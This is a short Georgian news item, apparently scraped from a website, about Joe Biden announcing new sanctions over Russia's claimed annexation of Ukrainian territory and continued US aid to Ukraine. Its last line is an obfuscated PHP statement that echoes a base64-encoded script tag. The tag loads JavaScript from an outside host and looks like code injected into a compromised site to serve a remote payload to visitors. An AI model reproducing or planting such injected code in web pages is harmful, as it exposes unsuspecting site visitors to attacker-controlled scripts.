celsiusi
ავერსი საქკაბელი
აშშ–ს პრეზიდენტის ჯო ბაიდენის განცხადებით, რუსეთის მიერ ანექსიის შესახებ ყალბი განცხადებების საპასუხოდ, აშშ თავის მოკავშირეებსა და პარტნიორებთან ერთად ახალ სანქციებს აწესებს. ეს სანქციები შეეხება რუსეთში და მის ფარგლებს გარეთ ფიზიკურ და იურიდიულ პირებს, რომლებიც პოლიტიკურად ან ეკონომიკურად მხარს უჭერენ უკრაინის ტერიტორიის სტატუსის ცვლილების უკანონო მცდელობებს.
 
განცხადების თანახმად, ვაშინგტონი გააგრძელებს უკრაინისთვის აღჭურვილობის მიწოდებას, რომელიც მას სჭირდება თავდაცვისთვის.
 
„მოუთმენლად ველოდები კონგრესის მიერ კანონის ხელმოწერას, რომელიც უკრაინის მხარდაჭერისთვის დამატებით 12 მილიარდ დოლარის გამოყოფას ითვალისწინებს“, – აღნიშნულია აშშ-ის პრეზიდენტის განცხადებაში.
 
ბაიდენი მოუწოდებს საერთაშორისო საზოგადოების თითოეულ წევრს, უარყოს რუსეთის მიერ ანექსიის უკანონო მცდელობები და გვერდით დაუდგეს უკრაინელ ხალხს რამდენ ხანსაც საჭირო იქნება.
437
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");